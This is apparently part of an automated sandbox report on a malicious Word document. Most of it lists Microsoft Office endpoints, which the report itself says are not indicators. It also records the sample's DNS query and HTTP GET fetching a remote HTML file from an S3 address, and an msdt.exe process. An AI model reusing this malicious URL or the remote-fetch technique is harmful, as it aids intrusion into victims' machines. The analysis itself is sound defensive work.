          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
          Source: msdt.exe, 0000000C.00000002.563441642.000000000077F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://addinslicensing.store.office.com/apps/remove
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://api.aadrm.com
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://api.aadrm.com/
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://api.cortana.ai
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://api.diagnostics.office.com
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://api.microsoftstream.com/api/
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://api.office.net
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://api.onedrive.com
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://apis.live.net/v5.0/
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://augloop.office.com
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://augloop.office.com/v2
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://cdn.entity.
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://clients.config.office.net/
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://config.edge.skype.com
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://cortana.ai
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://cortana.ai/api
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://cr.office.com
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://dataservice.o365filtering.com
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://dataservice.o365filtering.com/
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://dev.cortana.ai
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://devnull.onenote.com
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://directory.services.
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://enrichment.osi.office.net/
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://graph.ppe.windows.net
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://graph.ppe.windows.net/
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://graph.windows.net
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://graph.windows.net/
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&amp;premium=1
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&amp;premium=1
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&amp;premium=1
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://incidents.diagnostics.office.com
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://inclient.store.office.com/gyro/client
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://inclient.store.office.com/gyro/clientstore
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://invites.office.com/
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://lifecycle.office.com
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://login.microsoftonline.com/
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://login.windows.local
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://management.azure.com
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://management.azure.com/
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://messaging.action.office.com/
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://messaging.action.office.com/setcampaignaction
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://messaging.action.office.com/setuseraction16
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://messaging.engagement.office.com/
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://messaging.lifecycle.office.com/
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://messaging.lifecycle.office.com/getcustommessage16
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://messaging.office.com/
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://metadata.templates.cdn.office.net/client/log
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://my.microsoftpersonalcontent.com
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://ncus.contentsync.
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://ncus.pagecontentsync.
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://officeapps.live.com
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://officeci.azurewebsites.net/api/
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://officesetup.getmicrosoftkey.com
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://onedrive.live.com
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://onedrive.live.com/embed?
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://osi.office.net
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://otelrules.azureedge.net
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://outlook.office.com
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://outlook.office.com/
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://outlook.office365.com
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://outlook.office365.com/
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://pages.store.office.com/review/query
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://powerlift-frontdesk.acompli.net
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://powerlift.acompli.net
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://roaming.edog.
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://settings.outlook.com
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://shell.suite.office.com:1443
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://skyapi.live.net/Activity/
          Source: ~WRS{1EB9DA41-0F80-48E3-B000-307AD8C63D0C}.tmp.0.dr | String found in binary or memory: https://sqdocs.s3.eu-west-2.amazonaws.com/fb0f9c45-fb5f-4690-9815-e11a762d4739.html
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://staging.cortana.ai
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://store.office.cn/addinstemplate
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://store.office.de/addinstemplate
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://substrate.office.com/search/api/v2/init
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://tasks.office.com
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://web.microsoftstream.com/video/
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://webshell.suite.office.com
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://wus2.contentsync.
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://wus2.pagecontentsync.
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
          Source: 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr | String found in binary or memory: https://www.odwebp.svc.ms
          Note: the strings attributed to 112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.dr are Microsoft Office service endpoints carried in a file written by WINWORD.EXE itself (process 0) and are not indicators for this sample. The only sample-specific URL in this list is the sqdocs.s3.eu-west-2.amazonaws.com address found in the Word temporary file ~WRS{1EB9DA41-0F80-48E3-B000-307AD8C63D0C}.tmp, which is the external relationship target of the document.
          Source: unknown | DNS traffic detected: queries for: sqdocs.s3.eu-west-2.amazonaws.com
          Source: global traffic | HTTP traffic detected:
            GET /fb0f9c45-fb5f-4690-9815-e11a762d4739.html HTTP/1.1
            Accept: */*
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
            Accept-Encoding: gzip, deflate
